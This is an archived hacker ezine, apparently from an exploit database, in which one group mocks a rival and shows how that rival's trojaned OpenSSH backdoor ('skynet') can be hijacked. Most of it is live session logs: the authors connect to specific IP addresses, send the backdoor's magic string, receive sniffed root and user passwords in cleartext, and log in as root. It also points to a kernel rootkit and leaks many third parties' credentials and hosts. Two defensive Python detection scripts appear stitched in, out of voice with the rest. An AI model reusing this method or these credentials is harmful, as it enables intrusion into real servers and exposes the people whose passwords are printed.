LabSec Industries - x0x0x exposed

EDB-ID: 42906
CVE: N/A
Author: LabSec
Type: papers
Platform: eZine
Published: 2008-03-01

#!/labsec/v/for/vendetta:book1-x0x0x
######################################################################################################################
#                                                                                                                    #
#                    .____          ___.     _________                                                               #
#                    |    |   _____ \_ |__  /   _____/ ____   ____                                                   #
#                    |    |   \__  \ | __ \ \_____  \_/ __ \_/ ___\                                                  #
#                    |    |___ / __ \| \_\ \/        \  ___/\  \___                                                  #
#                    |_______ (____  /___  /_______  /\___  >\___  >                                                 #
#                            \/    \/    \/        \/     \/     \/                                                  #
#                    .___            .___              __         .__                                                #
#                    |   | ____    __| _/_ __  _______/  |________|__| ____   ______                                 #
#                    |   |/    \  / __ |  |  \/  ___/\   __\_  __ \  |/ __ \ /  ___/                                 #
#                    |   |   |  \/ /_/ |  |  /\___ \  |  |  |  | \/  \  ___/ \___ \                                  #
#                    |___|___|  /\____ |____//____  > |__|  |__|  |__|\___  >____  >                                 #
#                             \/      \/          \/                      \/     \/                                  #
#                                                                                                                    #
#                                                                                                                    #
#         - presents:                                                                                                #
#         \- x0x0x exposed -/                                                                                        #
#                                                                                                                    #
######################################################################################################################
#                                                               #
#                                                               #
#        chapter one   : random lame stuff                      #
#        chapter two   : owned by yourself                      #
#        chapter three : download files/sniffs/stuff            #
#        chapter four  : conclusion                             #
#                   - x0x0x -                                   #
#                                                               #
#                                                               #
# - [V]endetta.                                                 #
#                                                               #
#################################################################


- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)
- <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !


#################################################################
#                                                               #
#                                                               #
#            _              _                                   #
#         __| |_  __ _ _ __| |_ ___ _ _   ___ _ _  ___          #
#        / _| ' \/ _` | '_ \  _/ -_) '_| / _ \ ' \/ -_)         #
#        \__|_||_\__,_| .__/\__\___|_|   \___/_||_\___|         #                 
#                      |_|                                      #
#                                                               #
#                                                               #
#################################################################


first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))

[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt

have you noticed how lame they are ?

all they can & will ever do is change your openssh version to a cracked one
and pray that the users will log into some kool server

and guess what, its NOT EVEN MADE by them ! - lets check it out -

central@labsec [~xoxox/openssh-4.7p1] # more skynet.h 
/*

                    
                            ### #  ### ##   ###  ##  ### ###  ######  ######  
                            ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
                            ####    ###       ####    ### #    ####     ##     
                              ###   ####       ##     #####    ##       ##        
                            #  ##   ## ##      ##     ## ##    ## ##    ##        
                            ####   #### ##    ####   ### ##   ######   ####    

                                        - V E R S I O N  1. 0 -
                                             coded by fmrj
                                              11.01.2008


  Features:
  - Logs SSH, SCP, SFTP, SSHD and ip / hostname 
  - ftp logger included (netkit-ftp)
  - Encrypted sniffer logs
  - SSH, SCP, SFTP will not log you
  - compile script (see compile.sh)
  - rootlogin is permitted even though remoterootlogin is set to no
  - Will not log to syslog, utmp, wtmp or lastlog
  - If MAGIC_VERSION is NOT undeclared:
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
    (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
    Also this will NOT get logged by syslog
    
  
  Future features:
  - pid hiding
  - More encryption / better sniffer encryption (thought of rc-crypt)
  - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
  - Have a cool PS1 for the bd
  - Write a ssh client that can:
    -> Connect and dump logs so you dont have to use telnet approach (encrypted)
    -> That can do connect-chain (ssh -bounce box1 box2 box3)

  
  If you have this, it either means we are friends or someone gave it to you, if so
  I would like this bd to be kept as private as possible, so please dont pass it on

  I would also appreciate suggestions / ideas / help / whatever for future features 
  aim: fmrj09


  - Thanks * 

*/

- then there is some shit aion code which is public @ packetstorm - 
- their kool sshd backdoor kan be found in the end of thiz zine   -
- dont forget to check the gr8 shellscript skotch made            -

################################## leTz hIghTlIghT 50m3th1n6 #############################
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
################################## LETS HIGHLIGHT SOMETHING #############################

ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !

*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks* 


central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION		"netdump"


----- th4nk5 8uddY ------
----- end of lame sshd backdoor ----
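A passive check for the MAGIC_VERSION behaviour described above, as an added example (not code from the zine or from the backdoor): it classifies an already-reassembled port-22 TCP stream by whether the server answers with cleartext `user:` / `pass:` records instead of binary key exchange. The function names, verdict labels and sample streams are assumptions constructed for illustration; the record shape follows the `SSH2_OUT:` / `pass_from:` / `pam_from:` lines in the sessions in chapter two.

```python
import re

# One sniffer-log record as the zine's sessions show it:
#   <tag>: <address> user: <name> pass: <secret> (<hostname>)
# Only the shape is matched; the secret itself is never captured or returned.
RECORD = re.compile(rb"^[\w-]+:[ \t]+\S+[ \t]+user:[ \t]+\S+[ \t]+pass:", re.M)


def split_ident(data):
    """Return (identification line, bytes after it) for one direction.

    RFC 4253 lets a server send other text lines before its "SSH-" line,
    so lines are skipped until one starts with b"SSH-".
    """
    offset = 0
    while offset < len(data):
        end = data.find(b"\n", offset)
        if end == -1:
            end = len(data)
        line = data[offset:end].rstrip(b"\r")
        if line.startswith(b"SSH-"):
            return line, data[min(end + 1, len(data)):]
        offset = end + 1
    return None, data


def classify_stream(client, server):
    """Classify one reassembled TCP stream; returns (verdict, record_count).

    verdicts:
      not-ssh           server never sent an SSH identification line
      credential-dump   server sent cleartext user/pass records after its banner
      bad-client-ident  client's first line was not an SSH identification string
                        (a stock sshd answers "Protocol mismatch." and closes)
      normal            both sides identified themselves
    """
    server_ident, server_rest = split_ident(server)
    if server_ident is None:
        return "not-ssh", 0
    records = len(RECORD.findall(server_rest))
    if records:
        return "credential-dump", records
    client_first = client.split(b"\n", 1)[0].rstrip(b"\r")
    if not client_first.startswith(b"SSH-"):
        return "bad-client-ident", 0
    return "normal", 0


# --- constructed sample streams (placeholder values, documentation addresses) ---
DUMP_CLIENT = b"EXAMPLE-MAGIC\n"
DUMP_SERVER = (
    b"SSH-2.0-OpenSSH_4.7\n"
    b"SSH2_OUT: 192.0.2.10\tuser: alice\tpass: EXAMPLE-ONLY\t(host.example)\n"
    b"pass_from: 198.51.100.7\tuser: bob\tpass: EXAMPLE-ONLY\n"
)
MISMATCH_CLIENT = b"GET / HTTP/1.0\r\n\r\n"
MISMATCH_SERVER = b"SSH-2.0-OpenSSH_4.7\r\nProtocol mismatch.\n"
NORMAL_CLIENT = b"SSH-2.0-OpenSSH_4.7\r\n" + bytes([0, 0, 1, 0x0C, 0x0A, 0x14]) + b"\x8f" * 16
NORMAL_SERVER = b"SSH-2.0-OpenSSH_4.7\r\n" + bytes([0, 0, 1, 0x0C, 0x0A, 0x14]) + b"\x8f" * 16

if __name__ == "__main__":
    for name, c, s in [
        ("dump", DUMP_CLIENT, DUMP_SERVER),
        ("mismatch", MISMATCH_CLIENT, MISMATCH_SERVER),
        ("normal", NORMAL_CLIENT, NORMAL_SERVER),
    ]:
        print(name, classify_stream(c, s))
```

A `credential-dump` verdict means the host's sshd binary and every password typed through it should be treated as compromised.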

***************** phalanx the gr8 kernel rootkit ***************

7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?

PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2

* attached their k00l phalanx in the bottom of the zine *

***************** phalanx the gr8 kernel rootkit ***************

------ funny stuff:

while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..

[139.82.95.11:22]     : SSH-2.0-p2-FC-4.3
[212.200.96.150:22]   : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[216.75.56.186:22]    : SSH-2.0-OenSSH_4.2
[140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5
[143.107.250.214:22]  : SSH-1.99-p1
[201.62.131.185:22]   : SSH-2.0-p1 Debian-8ubuntu1.2
[200.144.189.17:22]   : SSH-1.99-p1

you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
answer: bad system admins. doing an easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners.
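The banner check mentioned above, as an added example (not code from the zine): it parses each SSH identification string against the RFC 4253 layout and flags the kinds of defects visible in the list above, plus any drift from a banner recorded at deployment. It assumes a fleet that runs stock OpenSSH only; the host labels, the baseline table, the finding labels and the two `OpenSSH_4.7` rows are constructed for illustration.

```python
import re
from difflib import SequenceMatcher

# RFC 4253 section 4.2: SSH-protoversion-softwareversion SP comments
IDENT = re.compile(r"^SSH-(?P<proto>[^-\s]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
# Shape of a stock OpenSSH software token, e.g. OpenSSH_4.7 or OpenSSH_4.3p2
OPENSSH = re.compile(r"^OpenSSH_\d+\.\d+(?:\.\d+)?(?:p\d+)?$")


def audit_banner(banner, baseline=None):
    """Return a list of finding labels for one banner (empty list = clean)."""
    banner = banner.strip()
    m = IDENT.match(banner)
    if m is None:
        return ["not-ssh-ident"]
    findings = []
    software = m.group("software")
    # RFC 4253 forbids '-' inside softwareversion
    if "-" in software:
        findings.append("dash-in-software")
    if not OPENSSH.match(software):
        product = software.split("_", 1)[0]
        likeness = SequenceMatcher(None, product.lower(), "openssh").ratio()
        if product == "OpenSSH":
            findings.append("bad-openssh-version")   # e.g. trailing punctuation
        elif likeness >= 0.8:
            findings.append("product-misspelled")    # near miss of "OpenSSH"
        elif re.match(r"p\d+", software):
            findings.append("product-missing")       # only the portable suffix is left
        else:
            findings.append("unknown-product")
    # A well-formed fake passes the syntax checks; only a recorded baseline catches it.
    if baseline is not None and banner != baseline.strip():
        findings.append("baseline-mismatch")
    return findings


def audit_fleet(observed, baselines):
    """Map host -> findings for every host whose banner has at least one finding."""
    report = {}
    for host, banner in observed.items():
        findings = audit_banner(banner, baselines.get(host))
        if findings:
            report[host] = findings
    return report


# Banners a-e are the strings quoted in the list above; host labels are constructed.
OBSERVED = {
    "host-a": "SSH-2.0-p2-FC-4.3",
    "host-b": "SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006",
    "host-c": "SSH-2.0-OenSSH_4.2",
    "host-d": "SSH-2.0-p1 Debian-5ubuntu0.5",
    "host-e": "SSH-1.99-p1",
    "host-f": "SSH-2.0-OpenSSH_4.7",  # constructed: well-formed, matches baseline
    "host-g": "SSH-2.0-OpenSSH_4.7",  # constructed: well-formed, baseline differs
}
# Constructed baseline: the banner recorded when each host was deployed.
BASELINES = {
    "host-f": "SSH-2.0-OpenSSH_4.7",
    "host-g": "SSH-2.0-OpenSSH_4.3",
}

if __name__ == "__main__":
    for host, findings in sorted(audit_fleet(OBSERVED, BASELINES).items()):
        print(host, ", ".join(findings))
```

A clean banner proves nothing on its own, so pair this with a checksum of the ssh/sshd binaries taken from trusted media, since a kernel rootkit on the host can falsify what local tools read.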


[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ?
they blame us about using the same password, what about their magic_password ? kool, they use the 'netdump' on all their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]

#################################################################
#                                                               #
#            __             __            __                    #
#       ____/ /  ___ ____  / /____ ____  / /__    _____         #
#      / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \        #
#      \__/_//_/\_,_/ .__/\__/\__/_/    \__/|__,__/\___/        #
#                  /_/                                          #
#                                                               #
#                                                               #
#################################################################

; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
;
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE




central@labsec [~xoxox/h3h3] # telnet 189.3.219.4 22
Trying 189.3.219.4...
Connected to 189.3.219.4 (189.3.219.4).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
SSH2_OUT: 127.0.0.1     user: root      pass: R4tD33Gl  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd
- cut-

******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4          
root@189.3.219.4's password: 



Last login: Fri Aug  8 16:27:40 2008 from 189.4.161.222


                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux servnet 2.6.18-4-486 i686 ****

root@servnet:~#
root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
          inet addr:189.3.219.4  Bcast:189.3.219.63  Mask:255.255.255.192

root@servnet:~# last -1 root
root     pts/2        189.4.161.222    Fri Aug  8 16:27 - 16:32  (00:04)
222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br.


******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 91.199.207.141 22
Trying 91.199.207.141...
Connected to 91.199.207.141.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
SSH2_OUT: 127.0.0.1     user: root      pass: buCeTTT   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
pass_from: 91.199.207.142       user: root      pass: salinarsalinar    (x2.sprintdns.net) -->>>>>>>>>> i hope you guys change the passwd real quick :)

central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
root@91.199.207.141's password: 

Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux x1 2.6.18-6-686 i686 ****

root@x1:~# 
root@x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
 08:24:44 up 9 days, 14:48,  0 users,  load average: 0.17, 0.11, 0.09
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0        97.139.broadband Sun Aug 10 12:17 - 12:38  (00:20)    
root@x1:~# ifconfig -a|grep inet
          inet addr:91.199.207.141  Bcast:91.199.207.255  Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] #  telnet 195.91.248.58 22
Trying 195.91.248.58...
Connected to 195.91.248.58.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
SSH2_OUT: 127.0.0.1     user: root      pass: DiVRuu    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.


central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
root@195.91.248.58's password: 

Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux localhost 2.6.24-gentoo-r3 i686 ****

localhost ~ # 
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU     E4500  @ 2.20GHz GenuineIntel GNU/Linux
 10:30:35 up 1 day, 22:21,  0 users,  load average: 0.15, 0.12, 0.09
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/1        ppp85-140-31-214 Mon Aug 11 13:00 - 13:07  (00:06)    

wtmp begins Mon Mar 31 21:49:08 2008
          inet addr:195.91.248.58  Bcast:195.91.248.63  Mask:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 195.71.126.86 22
Trying 195.71.126.86...
Connected to 195.71.126.86.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.2
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from: 91.128.212.13         user: root      pass: w22662s   (d91-128-212-13.cust.tele2.at) ---->>>> no localhost this time(yay!) but it works.

central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
root@195.71.126.86's password: 

root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
 08:34:52 up 42 days, 19:58,  3 users,  load average: 0,91, 1,05, 1,07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/39   chello0841120232 Sat00    3days  0.93s  0.89s mc
root     pts/5    chello0841120232 Fri09    2days  0.01s  0.01s -bash
root     pts/7    chello0841120232 Fri23    2days  1:20   1:20  mc
          inet Adresse:195.71.126.86  Bcast:195.71.126.95  Maske:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 152.66.208.100 22
Trying 152.66.208.100...
Connected to 152.66.208.100.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
SSH2_OUT: 127.0.0.1     user: joeb      pass: xaoAs..   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
pass_from: 78.131.80.171        user: joeb      pass: milegyen  (78-131-80-171.pool.hdsnet.hu)        > better be changing that by now.
SSH2_OUT: 78.131.80.171         user: joeb      pass: megistudom        (78-131-80-171.pool.hdsnet.hu)> better be changing that by now.
SSH2_OUT: 84.2.126.154  	user: joeb      pass: valami    (dsl54027E9A.pool.t-online.hu)        > better be changing that by now.

central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
root@152.66.208.100's password: 

Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux maszat 2.6.18-6-686-bigmem i686 ****

root@maszat:~#
root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
 08:41:36 up 25 days, 16:08,  0 users,  load average: 0.19, 0.15, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:152.66.208.100  Bcast:152.66.208.127  Mask:255.255.255.128
          inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 147.46.242.9 22
Trying 147.46.242.9...
Connected to 147.46.242.9.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
SSH2_OUT: 127.0.0.1     user: root      pass: NjKeyJ    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
pass_from: 147.46.242.52        user: dreameye  pass: ii1945    (ropas.snu.ac.kr)  ------>>>>>>>>>>>>>> sorry koreans, nothing personal.
pass_from: 211.48.102.167       user: dk        pass: 0ghafjs                      ------>>>>>>>>>>>>>> i mean, personal with you, you no.

central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
root@147.46.242.9's password: 

Last login: Thu Aug  7 03:35:51 2008 from ropas.snu.ac.kr

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux abs 2.6.24-19-server i686 ****

root@abs:~#
root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
 15:49:37 up 8 days,  1:53,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:147.46.242.9  Bcast:147.46.242.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
dreameye pts/0        ropas.snu.ac.kr  Thu Aug  7 03:35 - 03:36  (00:00) 

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022       ----- same applies for 200.160.119.93 (another dumbox on the network)
Trying 200.160.119.92...
Connected to 200.160.119.92.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user?
pass_from: 192.168.100.231      user: root      pass: m4c4c0z3e1        (tradestation231.eum.intranet)> hello m0nk3y

central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92 -p 8022
root@200.160.119.92's password: 

******* no skynet thiz timE *********** h3h3h3h3 ***********

Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
root@eumisrvgw2:~# 
root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 03:18:45 up 24 days,  9:43,  0 users,  load average: 0.01, 0.03, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:192.168.100.242  Bcast:192.168.100.255  Mask:255.255.255.0
          inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
          inet addr:192.168.200.254  Bcast:192.168.200.255  Mask:255.255.255.0
          inet addr:200.160.119.92  Bcast:200.160.119.95  Mask:255.255.255.240
          inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
          inet addr:200.169.223.172  Bcast:200.169.223.175  Mask:255.255.255.248

root@eumisrvgw2:~# last -10 root|grep 189\.4
root     pts/0        189.4.161.222    Mon Aug 11 14:24 - 14:44  (00:19)   ----------------------->>>>> i wonder who that kool ip iz.
                                                                           ----------------------->>>>> bruteforce again? what a zhame !
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.20.9.67 22
Trying 200.20.9.67...
Connected to 200.20.9.67.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1     user: root      pass: vEcTrrA   (localhost)

central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67 -p 8022
root@200.20.9.67's password: 

root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
 04:38:02 up 54 days,  1:50, 17 users,  load average: 0.05, 0.01, 0.00
root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT      ------------>> this is their default sniffer path.

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 203.161.120.230 22
Trying 203.161.120.230...
Connected to 203.161.120.230.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
pass_from: 58.7.216.153         user: root      pass: @pixar87  (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry pal.

central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
root@203.161.120.230's password: 

----- no skynet -------

Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au
zeus:~#
zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
 15:27:04 up 104 days,  6:19,  1 user,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:203.161.120.230  Bcast:203.161.120.255  Mask:255.255.255.240
          inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
          inet addr:11.11.11.3  Bcast:11.255.255.255  Mask:255.255.255.0

zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 207.145.66.12 22
Trying 207.145.66.12...
Connected to 207.145.66.12.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from: 24.218.192.76        user: root      pass: cl1pt3xt  (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro
pass_from: 75.68.31.152         user: gman      pass: 0xc0ffee  (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(

